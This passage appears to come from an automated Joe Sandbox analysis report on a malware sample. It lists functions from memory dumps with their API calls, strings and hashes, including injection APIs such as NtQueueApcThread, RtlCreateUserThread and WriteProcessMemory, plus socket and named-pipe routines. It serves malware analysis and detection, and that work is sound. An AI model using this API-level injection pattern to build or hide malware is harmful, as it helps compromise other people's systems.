Associated: 00000000.00000002.4147551380.00000000006E8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006EC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006F0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: RtlCreateUserThread$ntdll.dll
API String ID: 1646373207-2935400652
Opcode ID: 15f0dc51ca9a3cf6381f817f0897e39ef6e2971f7222ba54e661cb1281496193
Instruction ID: f7d6880b5ac6675472772b87e0c34800225034e51a4a653b21b2ce892d938ed2
Opcode Fuzzy Hash: 15f0dc51ca9a3cf6381f817f0897e39ef6e2971f7222ba54e661cb1281496193
Instruction Fuzzy Hash: CE016D32714B84C2EB60CF41F884789B7A9F798B80F99813AEA8D43B14DF38C5A5C740

Function 006B2538 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 006B255C
GetProcAddress.KERNEL32 ref: 006B256C

Strings

NtQueueApcThread, xrefs: 006B2562
ntdll, xrefs: 006B254F

Memory Dump Source

Source File: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.4147551380.00000000006E5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006E8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006EC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006F0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: NtQueueApcThread$ntdll
API String ID: 1646373207-1374908105
Opcode ID: d30a437afc947ebabf09e6ac1e31674b1d188f910b9a95b468b4020ddae0429a
Instruction ID: acf36c77e03e1c5e4047567523afe70901ef53a20673d79ae719adb15717a461
Opcode Fuzzy Hash: d30a437afc947ebabf09e6ac1e31674b1d188f910b9a95b468b4020ddae0429a
Instruction Fuzzy Hash: 8B01A966714B82C2EF109B56F850399B3A1F789BD0F984536DF5947B24DF38C5A1C700

Function 006AFF70 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 006AFF85
GetProcAddress.KERNEL32 ref: 006AFF95

Strings

kernel32, xrefs: 006AFF7E
IsWow64Process, xrefs: 006AFF8B

Memory Dump Source

Source File: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.4147551380.00000000006E5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006E8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006EC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006F0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: IsWow64Process$kernel32
API String ID: 1646373207-3789238822
Opcode ID: 0cc2c14e6aa49fa359cc5a066454d7c9afb306410e03beef033b30a086c723ab
Instruction ID: 1a1015b28150a7f0480c89b6d3482cae8f2d0fd671ef48ba0fc9b7650b898b0a
Opcode Fuzzy Hash: 0cc2c14e6aa49fa359cc5a066454d7c9afb306410e03beef033b30a086c723ab
Instruction Fuzzy Hash: 6AE02621B2070186FF40DB91F8843A8A362EB89780F482022E90B0A324EF3CC5E8CF00

Function 006B13DC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 006B13EC
GetProcAddress.KERNEL32 ref: 006B13FC

Strings

kernel32, xrefs: 006B13E5
Wow64RevertWow64FsRedirection, xrefs: 006B13F2

Memory Dump Source

Source File: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.4147551380.00000000006E5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006E8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006EC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006F0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: Wow64RevertWow64FsRedirection$kernel32
API String ID: 1646373207-3900151262
Opcode ID: 36b9989a3d64f40f2418a191821256b55915b9026f8b13fc485a792d70ae28d9
Instruction ID: fa94ab513a8daa5b3a59addd6eedfd088b13b35efae61353dbe773366d7c103b
Opcode Fuzzy Hash: 36b9989a3d64f40f2418a191821256b55915b9026f8b13fc485a792d70ae28d9
Instruction Fuzzy Hash: 6AD0A750F51706C2FE049B92F8587A82392EB9DB41F4C1027C81E0A320EE2DC1E9C740

Function 006B13A4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 006B13B4
GetProcAddress.KERNEL32 ref: 006B13C4

Strings

kernel32, xrefs: 006B13AD
Wow64DisableWow64FsRedirection, xrefs: 006B13BA

Memory Dump Source

Source File: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.4147551380.00000000006E5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006E8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006EC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006F0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: Wow64DisableWow64FsRedirection$kernel32
API String ID: 1646373207-736604160
Opcode ID: 5af8d57bb0da597028356cedd416d00d071a52161799d3d393d8390d6dec4b71
Instruction ID: 4645f7a59eec56740ecfadc6069437139d0d4cf0225c3d9ca9b4ea346e312dba
Opcode Fuzzy Hash: 5af8d57bb0da597028356cedd416d00d071a52161799d3d393d8390d6dec4b71
Instruction Fuzzy Hash: D4D0A750F5170682FE449B92F8547EC1352EB4DB40F8C1027881E0E320EE3DC1E9C740

Function 0352C3B7 Relevance: 6.3, APIs: 5, Instructions: 76COMMON

Download Yara Rule

APIs

malloc.LIBCMT ref: 0352C3DA

Part of subcall function 0352C60F: _FF_MSGBANNER.LIBCMT ref: 0352C63F
Part of subcall function 0352C60F: _NMSG_WRITE.LIBCMT ref: 0352C649
Part of subcall function 0352C60F: _callnewh.LIBCMT ref: 0352C67D
Part of subcall function 0352C60F: _errno.LIBCMT ref: 0352C688
Part of subcall function 0352C60F: _errno.LIBCMT ref: 0352C693

malloc.LIBCMT ref: 0352C3E8

Part of subcall function 0352C60F: _callnewh.LIBCMT ref: 0352C6A3
Part of subcall function 0352C60F: _errno.LIBCMT ref: 0352C6A8

malloc.LIBCMT ref: 0352C40A
_snprintf.LIBCMT ref: 0352C425

Part of subcall function 0352C9C3: _errno.LIBCMT ref: 0352C9FA
Part of subcall function 0352C9C3: _invalid_parameter_noinfo.LIBCMT ref: 0352CA05

malloc.LIBCMT ref: 0352C440

Memory Dump Source

Source File: 00000000.00000002.4147925142.0000000003510000.00000040.00001000.00020000.00000000.sdmp, Offset: 03510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3510000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: _errnomalloc$_callnewh$_invalid_parameter_noinfo_snprintf
String ID:
API String ID: 2026495703-0
Opcode ID: 517d69768db3b6bf3d395ac3c09d0a903cb9471390505f3454a2c5542d334632
Instruction ID: 38b7c06afa81c222265bc8fa088b46995e51a7c88d8a8983adf8b3941fb6c91c
Opcode Fuzzy Hash: 517d69768db3b6bf3d395ac3c09d0a903cb9471390505f3454a2c5542d334632
Instruction Fuzzy Hash: 19115B30A1CF184FD7A8EB6CA4452697AE1FB8D310F10455EE08AC32A6EA34A84187C2

Function 0352D9B3 Relevance: 6.2, APIs: 4, Instructions: 194COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 0352D9EB

Part of subcall function 0352F013: _getptd_noexit.LIBCMT ref: 0352F017

_invalid_parameter_noinfo.LIBCMT ref: 0352D9F6
_flush.LIBCMT ref: 0352DAA8
_fileno.LIBCMT ref: 0352DAC9

Memory Dump Source

Source File: 00000000.00000002.4147925142.0000000003510000.00000040.00001000.00020000.00000000.sdmp, Offset: 03510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3510000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: _errno_fileno_flush_getptd_noexit_invalid_parameter_noinfo
String ID:
API String ID: 634798775-0
Opcode ID: b2a8dbbb867a594f76b04f7a59aae2ecf5df5d729cd9875792cf73ff4dabdb8d
Instruction ID: 7ae34350f5554e3448b3a29bfdf7d104aec065fb3202730a6ba470f23cf197e0
Opcode Fuzzy Hash: b2a8dbbb867a594f76b04f7a59aae2ecf5df5d729cd9875792cf73ff4dabdb8d
Instruction Fuzzy Hash: 59411C3021CF1D4FC72CEA6DB455135BAF0F79A210B19066ED8AAC31F5EBA1D84286C6

Function 006B2A1C Relevance: 6.1, APIs: 4, Instructions: 96injectionCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 006B2A79
WriteProcessMemory.KERNEL32 ref: 006B2AB2
GetLastError.KERNEL32 ref: 006B2B14
GetLastError.KERNEL32 ref: 006B2B1F

Memory Dump Source

Source File: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.4147551380.00000000006E5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006E8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006EC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006F0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: ErrorLast$MemoryProcessWrite
String ID:
API String ID: 3937020117-0
Opcode ID: 758ccf515d5a04f9bcb79f0e870055d01cc9422dd9159b1358783e9b0281404f
Instruction ID: 93f9bb63deb8382bb30a4e426e16befbc230d10b6b64128e2db029a97eb140d0
Opcode Fuzzy Hash: 758ccf515d5a04f9bcb79f0e870055d01cc9422dd9159b1358783e9b0281404f
Instruction Fuzzy Hash: 603126A2705B5286DB74EF32A4607ED73D2BB48F84F440029AE8943754EF3DC686CB54

Function 03510517 Relevance: 6.1, APIs: 4, Instructions: 90COMMONLIBRARYCODE

Download Yara Rule

APIs

clock.LIBCMT ref: 0351055E
clock.LIBCMT ref: 0351056B
clock.LIBCMT ref: 03510574
clock.LIBCMT ref: 03510581

Memory Dump Source

Source File: 00000000.00000002.4147925142.0000000003510000.00000040.00001000.00020000.00000000.sdmp, Offset: 03510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3510000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: clock
String ID:
API String ID: 3195780754-0
Opcode ID: be8aec6b4dea647665e05a79d7238111acf2a2e9d648eaac77e3af4f201da4c7
Instruction ID: e5f8812f3da708293b62d95bd6a0354f340970f6199b04da1ab8bbde5104951f
Opcode Fuzzy Hash: be8aec6b4dea647665e05a79d7238111acf2a2e9d648eaac77e3af4f201da4c7
Instruction Fuzzy Hash: 4F1129B180C70D4FA728EDDCF485636F7D0FB85250F1A262EE8CAC3166E951DC9286D2

Function 0352D473 Relevance: 6.1, APIs: 4, Instructions: 64COMMONLIBRARYCODE

Download Yara Rule

APIs

_IsNonwritableInCurrentImage.LIBCMT ref: 0352D490

Part of subcall function 03531847: _FindPESection.LIBCMT ref: 03531870

_initp_misc_cfltcvt_tab.LIBCMT ref: 0352D4A1
_initterm_e.LIBCMT ref: 0352D4B4
_IsNonwritableInCurrentImage.LIBCMT ref: 0352D4FD

Memory Dump Source

Source File: 00000000.00000002.4147925142.0000000003510000.00000040.00001000.00020000.00000000.sdmp, Offset: 03510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3510000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: CurrentImageNonwritable$FindSection_initp_misc_cfltcvt_tab_initterm_e
String ID:
API String ID: 1991439119-0
Opcode ID: d0aacdeab6c747e7db722564a7347f1053155731eb9de77eec07b84fb13a130c
Instruction ID: 74daf8a2757845a4c39f35e08c6298e2a3b5beff80371be01787eeb5a9ccfd25
Opcode Fuzzy Hash: d0aacdeab6c747e7db722564a7347f1053155731eb9de77eec07b84fb13a130c
Instruction Fuzzy Hash: 1E118231214E198EE716FB74FCD46A6B7F8F786305B48452A8413C60B0EEB89A54C684

Function 006A10D0 Relevance: 6.1, APIs: 4, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

clock.LIBCMT ref: 006A1117
clock.LIBCMT ref: 006A1124
clock.LIBCMT ref: 006A112D
clock.LIBCMT ref: 006A113A

Memory Dump Source

Source File: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.4147551380.00000000006E5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006E8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006EC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006F0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: clock
String ID:
API String ID: 3195780754-0
Opcode ID: be8aec6b4dea647665e05a79d7238111acf2a2e9d648eaac77e3af4f201da4c7
Instruction ID: e3b64629c9789398baac16852d6fdce0c4c857091805a9296356addb52a72059
Opcode Fuzzy Hash: be8aec6b4dea647665e05a79d7238111acf2a2e9d648eaac77e3af4f201da4c7
Instruction Fuzzy Hash: 28116B3260474445D7B0FFA6688157BF6A2F7973E4F190139EF9847705E974CC82CA10

Function 006CD498 Relevance: 6.1, APIs: 4, Instructions: 62stringCOMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 006CD4BC

Part of subcall function 006BF454: _getptd.LIBCMT ref: 006BF46A
Part of subcall function 006BF454: __updatetlocinfo.LIBCMT ref: 006BF49F
Part of subcall function 006BF454: __updatetmbcinfo.LIBCMT ref: 006BF4C6

_errno.LIBCMT ref: 006CD4C8

Part of subcall function 006BFBCC: _getptd_noexit.LIBCMT ref: 006BFBD0

_invalid_parameter_noinfo.LIBCMT ref: 006CD4D3
strchr.LIBCMT ref: 006CD4E9

Memory Dump Source

Source File: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.4147551380.00000000006E5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006E8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006EC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006F0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: Locale$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_errno_getptd_getptd_noexit_invalid_parameter_noinfostrchr
String ID:
API String ID: 4151157258-0
Opcode ID: 9dcbabed976c9cb14c0e816df6bc5d9f8365d97b9e504a800266228e51b7a280
Instruction ID: cb0efbd75ae74735792fa4fb01679c9260e078611cd9076579fee16c6039d3a2
Opcode Fuzzy Hash: 9dcbabed976c9cb14c0e816df6bc5d9f8365d97b9e504a800266228e51b7a280
Instruction Fuzzy Hash: 4511E6A36082E481DB145B15E054BBEB693F380BDC79C913DEB964BB59DA3CC842CB10

Function 006BCEE0 Relevance: 6.0, APIs: 4, Instructions: 39networkCOMMON

Download Yara Rule

APIs

accept.WS2_32 ref: 006BCEF5
send.WS2_32 ref: 006BCF33
send.WS2_32 ref: 006BCF47
closesocket.WS2_32 ref: 006BCF58

Part of subcall function 006BD01C: closesocket.WS2_32 ref: 006BD028
Part of subcall function 006BD01C: free.LIBCMT ref: 006BD032
Part of subcall function 006BD01C: free.LIBCMT ref: 006BD03B
Part of subcall function 006BD01C: free.LIBCMT ref: 006BD044

Memory Dump Source

Source File: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.4147551380.00000000006E5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006E8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006EC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006F0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: free$closesocketsend$accept
String ID:
API String ID: 47150829-0
Opcode ID: 066e2fc8adee108644c0c95b9f8e143474d501460abce45f6e5e6b60318d2000
Instruction ID: 258e7e7e04e3ce369ef0a5729dc4cabc33a4c9b489c72118d998efc78735395e
Opcode Fuzzy Hash: 066e2fc8adee108644c0c95b9f8e143474d501460abce45f6e5e6b60318d2000
Instruction Fuzzy Hash: DA01846571465081EB649F37FA5177D2323EB89FF4F149211DE2607B88CE29C0D18B00

Function 006B3B3C Relevance: 6.0, APIs: 4, Instructions: 34sleeppipeCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 006B3B50
PeekNamedPipe.KERNEL32 ref: 006B3B75
Sleep.KERNEL32 ref: 006B3B8B
GetTickCount.KERNEL32 ref: 006B3B91

Memory Dump Source

Source File: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.4147551380.00000000006E5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006E8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006EC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006F0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: CountTick$NamedPeekPipeSleep
String ID:
API String ID: 1593283408-0
Opcode ID: 0d8f67eb847476cbf5cd18602dcd1106d203af1aa70024b801e6f9b985edf0b0
Instruction ID: fc2fbbbbced61ff382178811ec70f301fa48c60a7405253b86a73f607a4d550b
Opcode Fuzzy Hash: 0d8f67eb847476cbf5cd18602dcd1106d203af1aa70024b801e6f9b985edf0b0
Instruction Fuzzy Hash: 72F0A431B14A6082F7108B25F84434EB3A2E798B81F644125EB9D83B68DF39C5D58704

Function 006B31F8 Relevance: 6.0, APIs: 4, Instructions: 32sleeppipeCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 006B3211
PeekNamedPipe.KERNEL32 ref: 006B3236
Sleep.KERNEL32 ref: 006B324C
GetTickCount.KERNEL32 ref: 006B3252

Memory Dump Source

Source File: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.4147551380.00000000006E5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006E8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006EC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006F0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: CountTick$NamedPeekPipeSleep
String ID:
API String ID: 1593283408-0
Opcode ID: 6eb8226b971c676c39cd0dac2a4860ce413c34c9835dff083589f7d44e328186
Instruction ID: 2db642a73b7e65e779481bd9cd8e29826933c42da5ca363db1911766ea3da8d5
Opcode Fuzzy Hash: 6eb8226b971c676c39cd0dac2a4860ce413c34c9835dff083589f7d44e328186
Instruction Fuzzy Hash: E1F0AF32B14A6182F7208B65F84435EB772F7C8B94F254121EB9943B68DF3EC6E58B04

Function 006B5D78 Relevance: 6.0, APIs: 4, Instructions: 32memorythreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

InitializeProcThreadAttributeList.KERNEL32 ref: 006B5D96
GetProcessHeap.KERNEL32 ref: 006B5D9C
HeapAlloc.KERNEL32 ref: 006B5DAC
InitializeProcThreadAttributeList.KERNEL32 ref: 006B5DC7

Memory Dump Source

Source File: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.4147551380.00000000006E5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006E8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006EC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006F0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: AttributeHeapInitializeListProcThread$AllocProcess
String ID:
API String ID: 1212816094-0
Opcode ID: 22c9adbd14fdaacc8fb1e282febc10ff812bb060a347c24def4cc05294e67cba
Instruction ID: 9edacabb993f0c048038344f5e7130734f6706b29286289c4388044660798c7a
Opcode Fuzzy Hash: 22c9adbd14fdaacc8fb1e282febc10ff812bb060a347c24def4cc05294e67cba
Instruction Fuzzy Hash: 16F0BB62724A8482EB848B75F8547EA6392EFC8B80F685426FE0B42754DE3DC495CB00

Function 006BD01C Relevance: 6.0, APIs: 4, Instructions: 15COMMON

Download Yara Rule

APIs

closesocket.WS2_32 ref: 006BD028
free.LIBCMT ref: 006BD032

Part of subcall function 006BD188: HeapFree.KERNEL32 ref: 006BD19E
Part of subcall function 006BD188: _errno.LIBCMT ref: 006BD1A8
Part of subcall function 006BD188: GetLastError.KERNEL32 ref: 006BD1B0

free.LIBCMT ref: 006BD03B
free.LIBCMT ref: 006BD044

Memory Dump Source

Source File: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.4147551380.00000000006E5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006E8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006EC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006F0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: free$ErrorFreeHeapLast_errnoclosesocket
String ID:
API String ID: 1525665891-0
Opcode ID: f0a14ae54f92ead1c4b4b34f15b7183d60d2bbec5c8dcb145cd9b656117da10e
Instruction ID: bc6aff766885763a094e863ccdc4e8e415ff79d8a2f894f047934276a112fca5
Opcode Fuzzy Hash: f0a14ae54f92ead1c4b4b34f15b7183d60d2bbec5c8dcb145cd9b656117da10e
Instruction Fuzzy Hash: E3D05E92B2040091DB4CEF36FCA227C1322E7C9F84F1400229E1E8F321DD26CCD28384

Function 00401FD0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 209COMMON

Download Yara Rule

Strings

Unknown pseudo relocation bit size %d., xrefs: 00402294
Unknown pseudo relocation protocol version %d., xrefs: 004022A8

Memory Dump Source

Source File: 00000000.00000002.4147472908.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4147461082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4147472908.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4147501523.000000000040D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4147512918.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4147525678.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_THsSNYblMw.jbxd

Similarity

API ID:
String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
API String ID: 0-395989641
Opcode ID: 8caf0c066df89f6cee4c07a50155e792156557ee52966e310dcb16b3cca200fb
Instruction ID: 42e0c3400c77c9dd47adb4fdb8995eb2357067ceb312bbd9be83e7c2f840df7f
Opcode Fuzzy Hash: 8caf0c066df89f6cee4c07a50155e792156557ee52966e310dcb16b3cca200fb
Instruction Fuzzy Hash: 6A712272B10B9486DF10CF61DA0875A7761FB58BA8F58862ADF08377E8DB7DC540CA08

Function 0352976F Relevance: 5.4, APIs: 4, Instructions: 378COMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.LIBCMT ref: 035297E2
malloc.LIBCMT ref: 03529A06
malloc.LIBCMT ref: 03529B04

Part of subcall function 0352EAB7: _getptd.LIBCMT ref: 0352EAD6

free.LIBCMT ref: 03529AEC

Part of subcall function 0352C5CF: _errno.LIBCMT ref: 0352C5EF

Memory Dump Source

Source File: 00000000.00000002.4147925142.0000000003510000.00000040.00001000.00020000.00000000.sdmp, Offset: 03510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3510000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: malloc$_errno_getptdfree
String ID:
API String ID: 3172138858-0
Opcode ID: 4061ae52bcfc7ad85d2a69f0cdb15219ba76c7abfce3d0773e5d20170cf697d4
Instruction ID: c8352f8a844398d114a7358f4fa621d36b779d6679619d8d6da46c43e32520c5
Opcode Fuzzy Hash: 4061ae52bcfc7ad85d2a69f0cdb15219ba76c7abfce3d0773e5d20170cf697d4
Instruction Fuzzy Hash: 57B1F530629F198FE71AEF28F8916B53BF9F78A310B44422ED456C72B1D7389452C781

Function 00401DC0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109COMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32 ref: 00401E69

Strings

VirtualQuery failed for %d bytes at address %p, xrefs: 00401FBB
Address %p has no image-section, xrefs: 00401DC0, 00401FA5

Memory Dump Source

Source File: 00000000.00000002.4147472908.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4147461082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4147472908.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4147501523.000000000040D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4147512918.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4147525678.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_THsSNYblMw.jbxd

Similarity

API ID: QueryVirtual
String ID: VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
API String ID: 1804819252-157664173
Opcode ID: 24b42db9420a0036ba5551ca2cf6389df1f73159e8ba1386f4a30517d06c5471
Instruction ID: 52aafb0f448170306d42bca5540912cc2139dda9d14def77d71a33c16101a6f6
Opcode Fuzzy Hash: 24b42db9420a0036ba5551ca2cf6389df1f73159e8ba1386f4a30517d06c5471
Instruction Fuzzy Hash: 4B31E3B3702A4195EF118F12EA4175A3761BB95BA4F49413AEF4C273A1EF3CD486C788

Function 0352CBE7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 0352CC38

Part of subcall function 0352F013: _getptd_noexit.LIBCMT ref: 0352F017

_invalid_parameter_noinfo.LIBCMT ref: 0352CC43

Strings

B, xrefs: 0352CC6F

Memory Dump Source

